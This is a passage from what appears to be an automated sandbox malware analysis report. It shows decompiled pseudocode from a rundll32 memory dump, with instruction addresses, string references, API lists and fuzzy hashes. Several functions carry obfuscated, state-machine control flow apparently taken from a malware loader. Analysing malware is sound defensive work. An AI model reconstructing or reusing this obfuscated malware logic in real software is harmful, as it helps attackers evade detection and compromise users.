											_t168 = E00B22959(_t173, _v68, _v52, _v20, _v56);
											_t172 = _t168;
											_t205 =  &(_t205[4]);
											if(_t168 != 0) {
												_t173 = 0x6adc8a5;
												goto L1;
											}
										} else {
											if(_t173 == _t166) {
												E00B3507B(_v72, _v24, _v28, _v76, _t204);
												_t205 =  &(_t205[3]);
												_t196 =  !=  ? 1 : _t196;
												_t173 = 0x17a504e8;
												while(1) {
													L1:
													_t191 = 0x5c;
													goto L2;
												}
											} else {
												if(_t173 == 0x17a504e8) {
													E00B25FB2(_v32, _v60, _t204);
													_t173 = 0x3fc1d7;
													while(1) {
														L1:
														_t191 = 0x5c;
														L2:
														goto L3;
													}
												} else {
													if(_t173 != 0x1e312b00) {
														goto L21;
													} else {
														_t173 = 0x353ab5a;
														continue;
													}
												}
											}
										}
									}
								}
								goto L22;
							}
							E00B25FB2(_v36, _v12, _t172);
							_t173 = 0x26181ebc;
							_t166 = 0xd265085;
							_t191 = 0x5c;
							L21:
						} while (_t173 != 0x26181ebc);
						L22:
						return _t196;
					}
				}
			}

0x00b363c1
0x00b363c4
0x00b363d2
0x00b363d4
0x00b363d9
0x00b363dd
0x00b363e5
0x00b363ed
0x00b363f5
0x00b363fd
0x00b36405
0x00b3640d
0x00b36412
0x00b3641a
0x00b36422
0x00b3642a
0x00b36432
0x00b3643a
0x00b36442
0x00b3644a
0x00b36450
0x00b36455
0x00b3645b
0x00b36463
0x00b3646b
0x00b36473
0x00b3647b
0x00b36483
0x00b3648f
0x00b36494
0x00b3649a
0x00b3649f
0x00b364a7
0x00b364b4
0x00b364b7
0x00b364bb
0x00b364c3
0x00b364cb
0x00b364d3
0x00b364d8
0x00b364dd
0x00b364e5
0x00b364f5
0x00b364f9
0x00b36501
0x00b36509
0x00b36511
0x00b3651d
0x00b36520
0x00b36524
0x00b3652c
0x00b36534
0x00b3653c
0x00b36544
0x00b3654c
0x00b36554
0x00b3655c
0x00b36564
0x00b3656c
0x00b36574
0x00b36578
0x00b36580
0x00b3658d
0x00b36591
0x00b36599
0x00b365a1
0x00b365a9
0x00b365ae
0x00b365b6
0x00b365be
0x00b365c6
0x00b365cb
0x00b365d3
0x00b365d7
0x00b365db
0x00b365df
0x00b365e7
0x00b365ef
0x00b365f7
0x00b365ff
0x00b365ff
0x00b36601
0x00b36602
0x00b36602
0x00b36607
0x00000000
0x00b36607
0x00b36619
0x00b366f6
0x00b366fc
0x00b36707
0x00b36704
0x00b36704
0x00b3670c
0x00b3670f
0x00000000
0x00b3661f
0x00b36625
0x00b366d5
0x00b366da
0x00b366dd
0x00b366e6
0x00b366eb
0x00b366f0
0x00000000
0x00b3662b
0x00b36631
0x00b366a3
0x00b366a8
0x00b366aa
0x00b366af
0x00b366b5
0x00000000
0x00b366b5
0x00b36633
0x00b36635
0x00b36679
0x00b36680
0x00b36686
0x00b36689
0x00b365ff
0x00b365ff
0x00b36601
0x00000000
0x00b36601
0x00b36637
0x00b3663d
0x00b3665b
0x00b36661
0x00b365ff
0x00b365ff
0x00b36601
0x00b36602
0x00000000
0x00b36602
0x00b3663f
0x00b36645
0x00000000
0x00b3664b
0x00b3664b
0x00000000
0x00b3664b
0x00b36645
0x00b3663d
0x00b36635
0x00b36631
0x00b36625
0x00000000
0x00b36619
0x00b36722
0x00b3672a
0x00b3672f
0x00b36734
0x00b36735
0x00b36735
0x00b36741
0x00b3674a
0x00b3674a
0x00b36602

Strings

@', xrefs: 00B365DF
R|, xrefs: 00B364A7
A_k, xrefs: 00B363C4
ON, xrefs: 00B36463
VLA_k, xrefs: 00B3644A
$/, xrefs: 00B364F9
};, xrefs: 00B36432
2!, xrefs: 00B36578
*F, xrefs: 00B364C3

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $/$*F$2!$@'$A_k$ON$R|$VLA_k$};
API String ID: 0-175875280
Opcode ID: b5d7b17b519fa2f08fcbcfe4bc6d2ee7a7c1dd3dc1c28119689d4ea48f0a9aa0
Instruction ID: ab2ad07f6efa5eeda27d256ce379d7ca038c030536ff15503fedc2a1ee5db662
Opcode Fuzzy Hash: b5d7b17b519fa2f08fcbcfe4bc6d2ee7a7c1dd3dc1c28119689d4ea48f0a9aa0
Instruction Fuzzy Hash: 96815771508381ABD758CF24C49A81FBBF1FBD4358F604A1DF586962A0C7B5C948CB83

Uniqueness

Uniqueness Score: -1.00%

Function 00B32349, Relevance: 11.4, Strings: 9, Instructions: 190
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00B32349(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t153;
				void* _t168;
				signed int _t172;
				char _t177;
				signed int _t178;
				void* _t181;
				char* _t186;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int* _t214;

				_push(_a16);
				_push(0x40);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00B2602B(_t153);
				_v20 = 0x10;
				_t214 =  &(( &_v80)[6]);
				_v60 = 0xafa2;
				_v60 = _v60 ^ 0xad7cd4b0;
				_t178 = 0;
				_v60 = _v60 | 0x7a339cd1;
				_t181 = 0x15b39dc0;
				_v60 = _v60 ^ 0xff7ff485;
				_v64 = 0xe220;
				_v64 = _v64 >> 2;
				_v64 = _v64 | 0x618d1066;
				_v64 = _v64 ^ 0x618d4123;
				_v28 = 0xfe94;
				_t206 = 0x17;
				_v28 = _v28 / _t206;
				_v28 = _v28 ^ 0x000043c3;
				_v32 = 0x6fe3;
				_v32 = _v32 >> 1;
				_v32 = _v32 ^ 0x000078b7;
				_v36 = 0x3688;
				_t207 = 0x69;
				_v36 = _v36 * 0x5a;
				_v36 = _v36 ^ 0x00137d17;
				_v24 = 0x8157;
				_v24 = _v24 | 0x6dbfc3a0;
				_v24 = _v24 ^ 0x6dbfb45a;
				_v80 = 0xe945;
				_v80 = _v80 / _t207;
				_v80 = _v80 ^ 0xcc46d226;
				_t208 = 0x62;
				_v80 = _v80 / _t208;
				_v80 = _v80 ^ 0x0215c355;
				_v48 = 0x42ef;
				_v48 = _v48 + 0xffff3840;
				_v48 = _v48 << 4;
				_v48 = _v48 ^ 0xfff789fd;
				_v72 = 0xbf2b;
				_v72 = _v72 | 0xc326a1c7;
				_t209 = 0x4b;
				_v72 = _v72 / _t209;
				_v72 = _v72 | 0xd12f9700;
				_v72 = _v72 ^ 0xd3bfbe8a;
				_v52 = 0xfa61;
				_v52 = _v52 << 3;
				_v52 = _v52 + 0x5488;
				_v52 = _v52 ^ 0x00084626;
				_v56 = 0xb5dc;
				_v56 = _v56 | 0x6ca6e5ac;
				_v56 = _v56 * 0x5e;
				_v56 = _v56 ^ 0xe54e28a7;
				_v76 = 0xbf9d;
				_v76 = _v76 + 0xdb7b;
				_v76 = _v76 + 0xffff5618;
				_v76 = _v76 | 0xc179f847;
				_v76 = _v76 ^ 0xc1798349;
				_v40 = 0xd8e6;
				_v40 = _v40 + 0x2ceb;
				_v40 = _v40 + 0x406a;
				_v40 = _v40 ^ 0x0001168e;
				_v68 = 0x1b9c;
				_t210 = 0x7a;
				_v68 = _v68 * 0x38;
				_v68 = _v68 + 0xa456;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 ^ 0x00002836;
				_v44 = 0x7a08;
				_v44 = _v44 << 0xd;
				_v44 = _v44 / _t210;
				_v44 = _v44 ^ 0x00205e6a;
				while(_t181 != 0x12ef740) {
					if(_t181 == 0x13e246ff) {
						__eflags = _v16;
						_t186 =  &_v16;
						while(__eflags != 0) {
							_t177 =  *_t186;
							__eflags = _t177 - 0x30;
							if(_t177 < 0x30) {
								L11:
								__eflags = _t177 - 0x61;
								if(_t177 < 0x61) {
									L13:
									__eflags = _t177 - 0x41;
									if(_t177 < 0x41) {
										L15:
										 *_t186 = 0x58;
									} else {
										__eflags = _t177 - 0x5a;
										if(_t177 > 0x5a) {
											goto L15;
										}
									}
								} else {
									__eflags = _t177 - 0x7a;
									if(_t177 > 0x7a) {
										goto L13;
									}
								}
							} else {
								__eflags = _t177 - 0x39;
								if(_t177 > 0x39) {
									goto L11;
								}
							}
							_t186 = _t186 + 1;
							__eflags =  *_t186;
						}
						_t181 = 0x12ef740;
						continue;
					} else {
						if(_t181 == 0x15b39dc0) {
							_t181 = 0x3a71512f;
							continue;
						} else {
							if(_t181 != 0x3a71512f) {
								L19:
								__eflags = _t181 - 0x2b24b5a2;
								if(__eflags != 0) {
									continue;
								}
							} else {
								if(E00B2602C(_v60,  &_v16,  &_v20, _v64) != 0) {
									_t181 = 0x13e246ff;
									continue;
								}
							}
						}
					}
					return _t178;
				}
				_push(0xb3c030);
				_push(_v36);
				_t168 = E00B3878F(_v28, _v32, __eflags);
				E00B331E2(__eflags);
				_t143 =  &_v56; // 0x205e6a
				_t172 = E00B36A65(_v48, __eflags,  &_v16, _v72, _a16, 0x40, _t168, _v52,  *_t143, _v76);
				__eflags = _t172;
				_t152 = _t172 > 0;
				__eflags = _t152;
				_t178 = 0 | _t152;
				E00B32025(_v40, _t168, _v68, _v44);
				_t214 =  &(_t214[0xc]);
				_t181 = 0x2b24b5a2;
				goto L19;
			}

0x00b32350
0x00b32354
0x00b32356
0x00b3235a
0x00b3235e
0x00b3235f
0x00b32360
0x00b32365
0x00b3236d
0x00b32370
0x00b3237a
0x00b32382
0x00b32384
0x00b3238c
0x00b32391
0x00b32399
0x00b323a1
0x00b323a6
0x00b323ae
0x00b323b6
0x00b323c4
0x00b323c9
0x00b323cf
0x00b323d7
0x00b323df
0x00b323e3
0x00b323eb
0x00b323f8
0x00b323fb
0x00b323ff
0x00b32407
0x00b3240f
0x00b32417
0x00b3241f
0x00b3242f
0x00b32433
0x00b3243f
0x00b32444
0x00b3244a
0x00b32452
0x00b3245a
0x00b32462
0x00b32467
0x00b3246f
0x00b32477
0x00b32483
0x00b32486
0x00b3248a
0x00b32492
0x00b3249a
0x00b324a2
0x00b324a7
0x00b324af
0x00b324b7
0x00b324bf
0x00b324cc
0x00b324d0
0x00b324d8
0x00b324e0
0x00b324e8
0x00b324f2
0x00b324ff
0x00b3250c
0x00b32514
0x00b3251c
0x00b32524
0x00b3252c
0x00b3253b
0x00b3253c
0x00b32540
0x00b32548
0x00b3254d
0x00b32555
0x00b3255d
0x00b32568
0x00b3256c
0x00b32574
0x00b3257a
0x00b325bb
0x00b325c0
0x00b325c4
0x00b325c6
0x00b325c8
0x00b325ca
0x00b325d0
0x00b325d0
0x00b325d2
0x00b325d8
0x00b325d8
0x00b325da
0x00b325e0
0x00b325e0
0x00b325dc
0x00b325dc
0x00b325de
0x00000000
0x00000000
0x00b325de
0x00b325d4
0x00b325d4
0x00b325d6
0x00000000
0x00000000
0x00b325d6
0x00b325cc
0x00b325cc
0x00b325ce
0x00000000
0x00000000
0x00b325ce
0x00b325e3
0x00b325e4
0x00b325e4
0x00b325e9
0x00000000
0x00b3257c
0x00b32582
0x00b325b4
0x00000000
0x00b32584
0x00b3258a
0x00b3265e
0x00b3265e
0x00b32664
0x00000000
0x00000000
0x00b32590
0x00b325aa
0x00b325b0
0x00000000
0x00b325b0
0x00b325aa
0x00b3258a
0x00b32582
0x00b32673
0x00b32673
0x00b325ed
0x00b325f2
0x00b325fe
0x00b3260d
0x00b3261a
0x00b32637
0x00b3264c
0x00b3264e
0x00b3264e
0x00b3264e
0x00b32651
0x00b32656
0x00b32659
0x00000000

Strings

j^ , xrefs: 00B32562
j^ , xrefs: 00B3261A
/Qq:, xrefs: 00B325B4
6(, xrefs: 00B3254D
E, xrefs: 00B3241F
j@, xrefs: 00B3251C
/Qq:, xrefs: 00B32584
, xrefs: 00B32399
o, xrefs: 00B323D7

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $/Qq:$/Qq:$6($E$j@$j^ $j^ $o
API String ID: 0-892457230
Opcode ID: f8ed53ea3171a4baa26b572608d4e7b547e1ada886b04879b879ed1e1872b0ac
Instruction ID: 754175d910725a881c53be61a25bf061a7d195a768dea38355a302436859e5cf
Opcode Fuzzy Hash: f8ed53ea3171a4baa26b572608d4e7b547e1ada886b04879b879ed1e1872b0ac
Instruction Fuzzy Hash: 768185715093409FD758CF25C98661BBBE1BBC0B18F60484DF185962A0D7B5CA0ACF83

Uniqueness

Uniqueness Score: -1.00%

Function 100303BF, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E100303BF(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t77;
				intOrPtr* _t84;
				short* _t86;
				intOrPtr* _t91;
				intOrPtr* _t95;
				short _t113;
				void* _t114;
				intOrPtr* _t116;
				intOrPtr _t119;
				signed int* _t120;
				intOrPtr* _t123;
				signed short _t125;
				int _t127;
				void* _t131;
				signed int _t132;

				_push(__ecx);
				_push(__ecx);
				_t84 = _a4;
				_t33 = E10023FB6(__ecx, __edx);
				_t113 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t123 = _t3;
				_t4 = _t123 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t123 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t123 + 4; // 0x54
				_t116 = _t6;
				_v8 = _t34;
				_t91 = _t84;
				_t35 = _t84 + 0x80;
				 *_t123 = _t84;
				 *_t116 = _t35;
				if( *_t35 != 0) {
					E10030352(0x10045ee8, 0x16, _t116);
					_t91 =  *_t123;
					_t131 = _t131 + 0xc;
					_t113 = 0;
				}
				_push(_t123);
				if( *_t91 == _t113) {
					E1002FC7D(_t91);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t116)) == _t113) {
						E1002FD9D();
					} else {
						E1002FD04(_t91);
					}
					if( *((intOrPtr*)(_t123 + 8)) == 0) {
						_t77 = E10030352(0x10045bd8, 0x40, _t123);
						_t131 = _t131 + 0xc;
						if(_t77 != 0) {
							_push(_t123);
							if( *((intOrPtr*)( *_t116)) == 0) {
								E1002FD9D();
							} else {
								E1002FD04(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t123 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t84 + 0x100;
					if( *_t84 != 0 ||  *_t38 != 0) {
						_t39 = E100301C9(_t38, _t123);
					} else {
						_t39 = GetACP();
					}
					_t125 = _t39;
					if(_t125 == 0 || _t125 == 0xfde8 || IsValidCodePage(_t125 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t125;
						}
						_t119 = _a12;
						if(_t119 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t95 = _v8;
							_t15 = _t119 + 0x120; // 0xd0
							_t86 = _t15;
							 *_t86 = 0;
							_t16 = _t95 + 2; // 0x2
							_t114 = _t16;
							do {
								_t45 =  *_t95;
								_t95 = _t95 + 2;
							} while (_t45 != _v12);
							_t18 = (_t95 - _t114 >> 1) + 1; // -1
							_t47 = E1002FBCB(_t86, 0x55, _v8);
							_t132 = _t131 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E1000E341();
								asm("int3");
								_t130 = _t132;
								_t50 =  *0x1004d054; // 0xd94e5c04
								_v52 = _t50 ^ _t132;
								_push(_t86);
								_push(_t125);
								_push(_t119);
								_t52 = E10023FB6(_t97, _t114);
								_t87 = _t52;
								_t120 =  *(E10023FB6(_t97, _t114) + 0x34c);
								_t127 = E10030B18(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t127, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E1003880F(_t120, _t127,  *((intOrPtr*)(_t87 + 0x54)),  &_v272) == 0 && E10030C4A(_t127) != 0) {
										 *_t120 =  *_t120 | 0x00000004;
										_t120[2] = _t127;
										_t120[1] = _t127;
									}
									_t62 =  !( *_t120 >> 2) & 0x00000001;
								} else {
									 *_t120 =  *_t120 & _t56;
									_t62 = _t56 + 1;
								}
								return E100037EA(_t62, _v32 ^ _t130, _t114);
							} else {
								if(E1002A1D1(_t86, 0x1001, _t119, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t119 + 0x80; // 0x30
									_t86 = _t20;
									_t21 = _t119 + 0x120; // 0xd0
									if(E1002A1D1(_t21, 0x1002, _t86, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t68 = E10041C3B(_t97);
										_t97 = _t86;
										if(_t68 != 0) {
											L31:
											_t22 = _t119 + 0x120; // 0xd0
											if(E1002A1D1(_t22, 7, _t86, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t73 = E10041C3B(_t97);
											_t97 = _t86;
											if(_t73 == 0) {
												L32:
												_t119 = _t119 + 0x100;
												if(_t125 != 0xfde9) {
													E10038569(_t97, _t125, _t119, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t72 = E1002FBCB(_t119, 0x10, L"utf8");
													_t132 = _t132 + 0x10;
													if(_t72 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x100303c4
0x100303c5
0x100303c7
0x100303cc
0x100303d3
0x100303d5
0x100303d8
0x100303d8
0x100303db
0x100303db
0x100303e1
0x100303e4
0x100303e7
0x100303e7
0x100303ea
0x100303ed
0x100303ef
0x100303f5
0x100303f7
0x100303fc
0x10030406
0x1003040b
0x1003040d
0x10030410
0x10030410
0x10030412
0x10030416
0x1003045f
0x00000000
0x10030418
0x1003041d
0x10030426
0x1003041f
0x1003041f
0x1003041f
0x10030431
0x1003043b
0x10030440
0x10030445
0x1003044b
0x1003044f
0x10030458
0x10030451
0x10030451
0x10030451
0x10030464
0x10030464
0x10030445
0x10030431
0x1003046a
0x100305a6
0x100305a6
0x00000000
0x10030470
0x10030470
0x10030479
0x1003048a
0x10030480
0x10030480
0x10030480
0x10030491
0x10030495
0x00000000
0x100304b9
0x100304b9
0x100304be
0x100304c0
0x100304c0
0x100304c2
0x100304c7
0x100305a1
0x100305a3
0x100305a8
0x100305ac
0x100304cd
0x100304cd
0x100304d0
0x100304d0
0x100304d8
0x100304db
0x100304db
0x100304de
0x100304de
0x100304e1
0x100304e4
0x100304ee
0x100304f8
0x100304fd
0x10030502
0x100305ad
0x100305af
0x100305b0
0x100305b1
0x100305b2
0x100305b3
0x100305b4
0x100305b9
0x100305bd
0x100305c5
0x100305cc
0x100305cf
0x100305d0
0x100305d4
0x100305d5
0x100305da
0x100305e2
0x100305f1
0x100305fd
0x1003060e
0x10030616
0x10030630
0x1003063d
0x10030640
0x10030643
0x10030643
0x1003064d
0x10030618
0x10030618
0x1003061a
0x1003061a
0x1003065e
0x10030508
0x10030518
0x00000000
0x1003051e
0x10030520
0x10030520
0x1003052c
0x1003053a
0x00000000
0x1003053c
0x1003053c
0x1003053f
0x10030545
0x10030548
0x10030558
0x1003055d
0x1003056b
0x00000000
0x00000000
0x00000000
0x00000000
0x1003054a
0x1003054a
0x1003054d
0x10030553
0x10030556
0x1003056d
0x1003056d
0x10030579
0x10030599
0x00000000
0x1003057b
0x1003057b
0x10030585
0x1003058a
0x1003058f
0x00000000
0x10030591
0x00000000
0x10030591
0x1003058f
0x00000000
0x00000000
0x00000000
0x10030556
0x10030548
0x1003053a
0x10030518
0x10030502
0x100304c7
0x10030495

APIs

Part of subcall function 10023FB6: GetLastError.KERNEL32(?,70D9FFF6,?,1000F7D4,70D9FFF6,?,00000000,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10023FBB
Part of subcall function 10023FB6: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,70D9FFF6,00000000,00000000), ref: 10024059

GetACP.KERNEL32(?,?,?,?,?,?,10025264,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 10030480
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,10025264,?,?,?,00000055,?,-00000050,?,?), ref: 100304AB
_wcschr.LIBVCRUNTIME ref: 1003053F
_wcschr.LIBVCRUNTIME ref: 1003054D
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 1003060E

Strings

utf8, xrefs: 1003057D

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: 75ced19ce70953ca1f26dd45113d273372e98ffb565c56be818b802edc0bfbfe
Instruction ID: b55e07c89fb835d358cde5702a7072b0253a21d250fe5499c22d51fbea95a080
Opcode Fuzzy Hash: 75ced19ce70953ca1f26dd45113d273372e98ffb565c56be818b802edc0bfbfe
Instruction Fuzzy Hash: 7D711675A02606AFE716DB35DC52BAB73E8EF49382F114439FA45DF181EB70EA408760

Uniqueness

Uniqueness Score: -1.00%

Function 00B39B45, Relevance: 10.3, Strings: 8, Instructions: 294
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00B39B45(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				signed int* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				unsigned int _v112;
				signed int _v116;
				void* _t241;
				intOrPtr _t259;
				void* _t260;
				intOrPtr _t268;
				intOrPtr _t269;
				intOrPtr _t270;
				intOrPtr _t274;
				intOrPtr* _t281;
				signed int _t283;
				void* _t315;
				intOrPtr* _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int* _t322;
				signed int* _t325;
				void* _t327;

				_t281 = _a8;
				_push(_t281);
				_push(_a4);
				_t316 = __ecx;
				_push(__edx);
				_push(__ecx);
				E00B2602B(_t241);
				_v76 = 0xd801;
				_t325 =  &(( &_v116)[4]);
				_v76 = _v76 >> 6;
				_t315 = 0;
				_t283 = 0xafaf7d2;
				_t317 = 6;
				_v76 = _v76 * 0x2a;
				_v76 = _v76 ^ 0x0000b202;
				_v80 = 0xa1a8;
				_v80 = _v80 | 0xe917477a;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0xa45f8c0e;
				_v84 = 0x144b;
				_v84 = _v84 + 0xffffbc75;
				_v84 = _v84 * 0x6d;
				_v84 = _v84 ^ 0xffeb93ca;
				_v52 = 0x2e4b;
				_v52 = _v52 | 0x557249c0;
				_v52 = _v52 ^ 0x346b51fe;
				_v52 = _v52 ^ 0x611902e1;
				_v56 = 0xfad0;
				_v56 = _v56 + 0xffff1342;
				_v56 = _v56 ^ 0x8fd20197;
				_v56 = _v56 ^ 0x8fd21d65;
				_v96 = 0x8e39;
				_v96 = _v96 + 0xd833;
				_v96 = _v96 + 0xffffc0bd;
				_v96 = _v96 >> 0xa;
				_v96 = _v96 ^ 0x000036ba;
				_v12 = 0xb209;
				_v12 = _v12 ^ 0xf6f529e5;
				_v12 = _v12 ^ 0xf6f5ec43;
				_v64 = 0xc247;
				_v64 = _v64 + 0xffff53d4;
				_v64 = _v64 << 9;
				_v64 = _v64 ^ 0x002c2f20;
				_v100 = 0x41c0;
				_v100 = _v100 | 0x528356d8;
				_v100 = _v100 ^ 0x6d95e5a5;
				_v100 = _v100 >> 1;
				_v100 = _v100 ^ 0x1f8b2fe0;
				_v16 = 0x904b;
				_v16 = _v16 + 0x3d62;
				_v16 = _v16 ^ 0x0000a85c;
				_v68 = 0xf7e0;
				_v68 = _v68 | 0xcc3d0ce1;
				_v68 = _v68 >> 7;
				_v68 = _v68 ^ 0x01982b66;
				_v72 = 0x69a0;
				_v72 = _v72 / _t317;
				_v72 = _v72 ^ 0xd5ac5c66;
				_v72 = _v72 ^ 0xd5ac219b;
				_v20 = 0x9739;
				_v20 = _v20 << 2;
				_v20 = _v20 ^ 0x000260e8;
				_v24 = 0xc564;
				_t318 = 0x2c;
				_v24 = _v24 / _t318;
				_v24 = _v24 ^ 0x00005d30;
				_v88 = 0xe78a;
				_v88 = _v88 >> 1;
				_v88 = _v88 << 4;
				_v88 = _v88 ^ 0x00070feb;
				_v28 = 0x7421;
				_v28 = _v28 + 0xffff545c;
				_v28 = _v28 ^ 0xfffff127;
				_v32 = 0x3ef3;
				_t319 = 0x23;
				_v32 = _v32 * 0x1e;
				_v32 = _v32 ^ 0x00070388;
				_v36 = 0x1f6a;
				_v36 = _v36 << 0xa;
				_v36 = _v36 ^ 0x007d8833;
				_v104 = 0xc791;
				_v104 = _v104 + 0xffffa2ac;
				_v104 = _v104 * 0x2b;
				_v104 = _v104 + 0x587f;
				_v104 = _v104 ^ 0x00127594;
				_v40 = 0xa663;
				_v40 = _v40 + 0xffffc5d4;
				_v40 = _v40 ^ 0x00001ad7;
				_v44 = 0x2b76;
				_v44 = _v44 << 0xc;
				_v44 = _v44 ^ 0x02b774b0;
				_v92 = 0xa27;
				_v92 = _v92 / _t319;
				_v92 = _v92 + 0xffff3569;
				_v92 = _v92 ^ 0xffff2eae;
				_v108 = 0xf211;
				_t320 = 0x54;
				_v108 = _v108 / _t320;
				_v108 = _v108 >> 0xb;
				_v108 = _v108 | 0x89ac3126;
				_v108 = _v108 ^ 0x89ac4c52;
				_v112 = 0x8d71;
				_v112 = _v112 >> 0xa;
				_v112 = _v112 | 0xeb52e524;
				_v112 = _v112 >> 4;
				_v112 = _v112 ^ 0x0eb57242;
				_v48 = 0x270e;
				_v48 = _v48 | 0xda2d7f86;
				_v48 = _v48 ^ 0xda2d74b2;
				_v116 = 0xd303;
				_v116 = _v116 ^ 0x52d81e99;
				_t321 = 0x2e;
				_t322 = _v4;
				_v116 = _v116 / _t321;
				_v116 = _v116 * 0x47;
				_v116 = _v116 ^ 0x7fdf43a3;
				while(1) {
					_t258 = _v60;
					while(1) {
						L2:
						_t327 = _t283 - 0x1af8f879;
						if(_t327 <= 0) {
							break;
						}
						if(_t283 == 0x20f5637b) {
							_t259 =  *0xb3ca20; // 0x0
							_t260 = E00B31B49( &_v8, _v12, _t283,  *((intOrPtr*)(_t259 + 0x2c)), _t283, _v64, _v100);
							_t325 =  &(_t325[5]);
							if(_t260 == 0) {
								_t283 = 0x33905d8a;
								L26:
								if(_t283 == 0xc271ab7) {
									L30:
									return _t315;
								}
								while(1) {
									_t258 = _v60;
									goto L2;
								}
							}
							_t283 = 0x1af8f879;
							while(1) {
								_t258 = _v60;
								goto L2;
							}
						}
						if(_t283 == 0x28aacb6e) {
							if( *((intOrPtr*)(_t281 + 4)) < 0x74) {
								goto L30;
							}
							_t283 = 0x351bb9b3;
							continue;
						}
						if(_t283 == 0x33905d8a) {
							if(_t315 == 0) {
								E00B2F536(_v52, _v56, _v96,  *_t316);
							}
							goto L30;
						}
						if(_t283 != 0x351bb9b3) {
							goto L26;
						}
						_t283 = 0xa3bf63c;
					}
					if(_t327 == 0) {
						E00B32674(_v16, _v68, _t322,  *_t316, _v72, _v20, _t258);
						_t325 =  &(_t325[5]);
						_t283 = 0xc483d1b;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 == 0xa3bf63c) {
						 *((intOrPtr*)(_t316 + 4)) =  *((intOrPtr*)(_t281 + 4)) - 0x74;
						_push(_t283);
						_push(_t283);
